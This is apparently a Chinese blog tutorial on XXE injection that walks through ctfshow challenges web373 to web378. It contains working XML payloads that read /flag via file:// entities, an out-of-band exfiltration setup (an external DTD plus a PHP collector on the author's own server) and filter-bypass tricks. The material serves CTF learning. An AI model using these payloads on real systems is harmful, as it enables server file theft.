XXE漏洞知识及ctfshow例题

XXE漏洞相关知识

XXE全称为XML Enternal Entity Injection 中文叫xml外部实体注入

什么是xml

简单了解XML：

（xml和html的区别可以简易的理解成：xml是用来储存数据和传输数据的而html是用来将数据展现出来）

XML 指可扩展标记语言（EXtensible Markup Language） XML 是一种标记语言，很类似 HTML XML 被设计为传输和存储数据，其焦点是数据的内容 XML 被设计用来结构化、存储以及传输信息 XML 允许创作者定义自己的标签和自己的文档结构语法：

XML元素都必须有关闭标签 XML 标签对大小写敏感 XML 必须正确地嵌套 XML 文档必须有根元素 XML 的属性值须加引号结构：

XML 文档声明，在文档的第一行 XML 文档类型定义，即DTD，XXE 漏洞所在的地方 XML 文档元素例子：

<?xml version="1.0" encoding="UTF-8"?><!--说明了xml文档的版本还有编码类型 经常出现在xml文档的开头-->
<userConfig>
    <user>
        <username>john_doe</username>
        <password>secretpassword</password>
        <language>en_US</language>
        <theme>dark</theme>
    </user>
    <user>
        <username>jane_smith</username>
        <password>anotherpassword</password>
        <language>fr_FR</language>
        <theme>light</theme>
    </user>
</userConfig>

在xml文档中注释是使用进行注释

以上是一个简单的xml文档其中的<userConfig>元素中嵌套着<user>；<user>中嵌套着<username> <password> <language> <theme>这些元素

而这些元素其中的jane_smith则为这个xml文档中储存的数据

（

为什么都有数据库了还要用xml来储存数据：我个人认为是因为数据库对于我们来说可读性不高因为可能都是经过加密或者编码后的而xml相对来说可读性就很高便于人识别，经常用来当作配置文件

以下是一些使用 XML 的情况：

数据交换格式：XML 是一种通用的数据交换格式，在不同系统之间传递数据时非常有用。许多 Web 服务和 API 使用 XML 作为数据格式来传输数据。
配置文件：XML 被广泛用于配置文件中，例如在 Web 应用程序、桌面应用程序和服务器软件中。XML 的结构化特性和可读性使其非常适合用于表示配置信息。
文档存储：对于一些具有层次结构的数据，如文档、报告或配置文件，XML 可以提供一种简单的、易于理解的存储格式。某些情况下，将这些数据存储为 XML 文件可能比使用数据库更合适。
面向文本的数据：如果数据的主要形式是文本，而不是结构化数据，那么将其存储为 XML 文件可能更加合适。XML 具有自我描述性，因此即使在没有其他说明的情况下，也可以轻松地理解数据的结构和内容。
支持分散的数据存储：在一些分散式系统中，每个组件都可能需要维护自己的数据存储。在这种情况下，XML 可以作为一种轻量级的、独立的数据存储格式，允许每个组件在不依赖中央数据库的情况下管理自己的数据

）

DTD（文档类型定义）

dtd通常在xml文档中在 XML 中，可以使用 DTD 来定义以下内容：

元素的结构和关系：DTD 可以定义 XML 文档中的元素以及它们之间的层次结构和关系。这包括定义元素的名称、元素可以包含的子元素、子元素的顺序和数量等信息。
元素的属性：DTD 可以定义元素可以具有的属性，包括属性的名称、数据类型、取值范围等信息。
实体：DTD 还可以声明实体，用于在 XML 文档中定义可重复使用的文本片段或字符。这样可以使 XML 文档更具可读性和可维护性。
CDATA 部分：DTD 可以定义 CDATA（Character Data，字符数据）部分，用于包含文本数据而不进行 XML 解析。CDATA 部分通常用于包含特殊字符或者大段文本数据。

通过使用 DTD，可以为 XML 文档定义结构和约束，以确保文档的有效性和一致性。DTD 可以内联在 XML 文档中，也可以作为单独的文件引用

例：

<!DOCTYPE bookstore [
    <!-- 定义书籍元素 括号中是book元素的子元素 -->
    <!ELEMENT book (title, author, year, price)>
    
    <!-- 定义标题元素 其中#PCDATA表示这些元素可以包含文本数据 -->
    <!ELEMENT title (#PCDATA)>
    
    <!-- 定义作者元素 -->
    <!ELEMENT author (#PCDATA)>
    
    <!-- 定义出版年份元素 -->
    <!ELEMENT year (#PCDATA)>
    
    <!-- 定义价格元素 -->
    <!ELEMENT price (#PCDATA)>
    
    <!-- 定义书店元素 -->
    <!ELEMENT bookstore (book+)>
]>

DTD声明

dtd声明可以分为外部声明和内部声明

外部声明：

<!DOCTYPE note SYSTEM "flag.php">

其中的SYSTEM可以理解成他会把在它后边的内容理解成一个合法的系统标识，从而找到文件的位置

内部声明：

<!DOCTYPE bookstore [
    <!ELEMENT bookstore (book*)> 
    <!-- 其中的*表示一个或多个book元素 -->
    <!ELEMENT book EMPTY>
    <!-- 其中的EMPTY表示book是一个空元素 -->
    <!ATTLIST book
        id ID #REQUIRED
        title CDATA #IMPLIED
    >
]>

实体

内部实体：<!ENTITY 实体名称 "实体值">

例：

<!DOCTYPE article [
    <!ENTITY title "Introduction to XML">
    <!ENTITY author "John Doe">
    <!ENTITY date "2024-03-26">
]>
<article>
    <title>&title;</title>
    <author>&author;</author>
    <date>&date;</date>
    <content>
        <!-- 文章内容 -->
    </content>
</article>

外部实体：<!ENTITY 实体名称 SYSTEM "外部文件URI">

假设我们有一个包含很多实体的外部 XML 文件 entities.xml，它定义了一些常用的术语如下：

<!DOCTYPE entities [
    <!ENTITY term1 "XML">
    <!ENTITY term2 "HTML">
    <!ENTITY term3 "CSS">
]>

现在我们可以在另一个 XML 文档中引用这个外部实体文件，并且重复使用其中定义的术语如下：

<!DOCTYPE article SYSTEM "entities.xml">
<article>
    <title>Introduction to &term1;</title>
    <content>
        &term1; is a markup language used for structuring and presenting content on the web.
        &term2; is another markup language commonly used in web development.
        &term3; is a style sheet language used for describing the presentation of a document written in a markup language.
    </content>
</article>

ctfshow例题

web 373

源码解析：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
//以上是注释不用管

error_reporting(0);//禁用错误报告
libxml_disable_entity_loader(false);//可以使用实体加载器；如果将false改为ture那么将禁用实体加载器

//以下这个点将会成为我们注入的关键

$xmlfile = file_get_contents('php://input');//从输入流中获取
if(isset($xmlfile)){
    $dom = new DOMDocument();//创建了一个DOMDocument对象
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);//这行代码加载 XML 数据到 DOMDocument 对象中。LIBXML_NOENT 和 LIBXML_DTDLOAD 是解析选项，用于控制解析器的行为。其中，LIBXML_NOENT 用于防止实体替换，LIBXML_DTDLOAD 用于允许加载 DTD
    $creds = simplexml_import_dom($dom);//这行代码将 DOMDocument 对象转换为 SimpleXMLElement 对象 这样可以更简单的对数据进行处理
    $ctfshow = $creds->ctfshow;//寻找数据中的ctfshow元素或者实体
    echo $ctfshow;//将其输出
}
highlight_file(__FILE__);//高亮显示这个文档的代码

有以上的代码可以知道我们需要在传入的数据中有实体并且这个实体存在于元素ctfshow中开始构造：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe[
    <!ENTITY hack SYSTEM "file:///flag">
]>
<H3rme>
    <ctfshow>
        &hack;
    </ctfshow>
</H3rmes>

注意：

对于DOCTYPE和ENTITY的拼写一定要注意不要拼写错误了还有file://后表示访问本地文件的路径/表示根目录我试过./不行表示当前文件夹

还有一点元素ctfshow一定要直接放到根元素下这样才能被直接访问到我试过加一个元素嵌套或者直接把ctfshow作为根元素但是不行这样会导致它不能直接的正确地解析到直接在根元素下的元素

这些问题都会直接导致无法正确的输出flag

操作如图：

屏幕截图 2024-03-27 214354

以上是改包直接在bp中看response

也可以直接改包发包然后在浏览器中看flag 如图：

屏幕截图 2024-03-27 214449

实体替换：

举个例子：

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE example[
    <!ENTITY hello "Hello, World!">
]>
<root>
    <greeting>&hello;</greeting>
</root>

以上代码中的&hello会被替换成Hello，world这便是实体替换

但是以下代码中的实体是指路径不是具体的值所以并不能算实体替换

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe[
    <!ENTITY hack SYSTEM "file:///flag">
]>
<H3rmesk1t>
    <ctfshow>
        &hack;
    </ctfshow>
</H3rmesk1t>

web374

源码：

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

经过和第一关的对比发现这关比上一关少一些代码

 $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;

也就是说这关无法将我们想要的flag输出因此我们不能再试图从页面中得到flag可以试试去将其中的flag输出到其他地方比如：通过一个网址将其输入到对应的服务器上

（前提要有一个公网ip也就是需要一个服务器操作系统要centos [推荐学生可以去免费领几个月：ECS云服务器学生权益] 然后下载宝塔这样便于我们对根目录的文件进行操作相关教程可以去网上搜）注意：在操作的时候要注意的几个点：

新建的时候这样操作可以直接通过这个ip来访问而且也可以对其的根目录文件操作，同时不需要再去购买域名

还有一点：

屏幕截图 2024-03-29 130659

如果重启web服务器而且各种办法都没有办法解决的话可以去试试换个浏览器（亲测有奇效）

然后开始做题：

首先在我们在宝塔中所创建的网站的根目录下创建两个文件

如图：

xxe.xml:

<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://填自己创建的网站的ip/1.php?file=%file;'> ">
%dtd;
%xxe;

这行代码使用了两个实体参数%就是一个html实体编码和%一样它的作用是当xml解析器解析是会去访问http://填自己创建的网站的ip/1.php?file=%file从而会通过get传参将参数%file中的内容输入到这个网站对应的目录中

1.php:

<?php 
file_put_contents("test.txt", $_GET['file']) ; 
?>

和以上代码搭配使用将file的内容传入到文件test.txt中

然后payload：

<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://填自己创建的网站的ip/xxe.xml">
%aaa;
]>
<root>123</root>
<!--以上代码同样也主要是实体参数 可以看出参数%file的内容是经过base64编码后的flag（php://filter 是封装器，用于对数据进行过滤和处理）然后先声明%aaa 然后通过%aaa进行访问到xml文件从而将参数%file成功传入再通过后端php最后会出现一个新文件test.txt里面的内容便是经过base64编码后的flag 
在这里因为flag中存在特殊字符在传输的时候可能会导致出现错误所以进行了base64编码-->

如图:

然后刷新宝塔发现新出现了一个test.txt

如图：

然后将里面的内容进行base64解码在线解码工具：Base64 解码和编码 - 在线

如图：

屏幕截图 2024-03-29 161404

屏幕截图 2024-03-29 161434

完成！

web375

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:22:05
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

本关是在上一关的基础上又加了一个正则匹配<?xml version="1.0"?>

我们只需要把上一关的xxe.xml改成xxe.dtd

还有payload也要相应的改变一下

<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://填自己创建的网站的ip/xxe.dtd">
%aaa;
]>
<root>123</root>

其余操作不变

如图：

屏幕截图 2024-03-29 164653

屏幕截图 2024-03-29 164717

屏幕截图 2024-03-29 164728

屏幕截图 2024-03-29 165021

解决！

也可以通过大写.XML来绕过

web 376

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:23:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

这关只是在正则匹配上做了一些改变变成了正则匹配的时候不区分大小写

直接拿上一关的方法做即可！

web 377

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:26:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);

这一关在前两关的基础上又加了不区分大小写的过滤http

使用utf-16编码http即可其他的一模一样

在实战中因为burp不能使用半角字符所以只能使用编码

一个个试即可：

整体简述
在开始之前，我想先简单说一下
在浏览器的地址栏中输入url，发送http请求头(涉及tcp/ip/dns)
http://example.com/test.php
远程的web服务器(apache/iis等)接收到url，分析请求头，根据它找到对应资源，返回一个响应头和数据

可以被浏览器解析的编码：
unicode编码：（utf-8,utf-16,utf-32）

url编码
html编码

web 378

如图：

先输入点东西抓包看看如图：

屏幕截图 2024-03-29 213327

发现输入的内容直接出现在了元素中那我们在前面加上一个实体声明（内容要指向flag的路径）再在后面的元素中引用这个实体便可以将flag输出

直接构造payload：

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>123</password>
</user>

123无所谓什么都可以但是其他的不能变逻辑原理就是：一个内容要指向flag的路径的实体声明再在后面的元素中引用这个实体便可以将flag输出

如图：

屏幕截图 2024-03-29 213556

OVER!

其实当我看到输入的内容出现在元素中的时候我其实第一想到的是xss但是试了一下发现压根不行又看了一下页面源代码发现压根不存在注入所以burp所抓的发送包是经过后端源码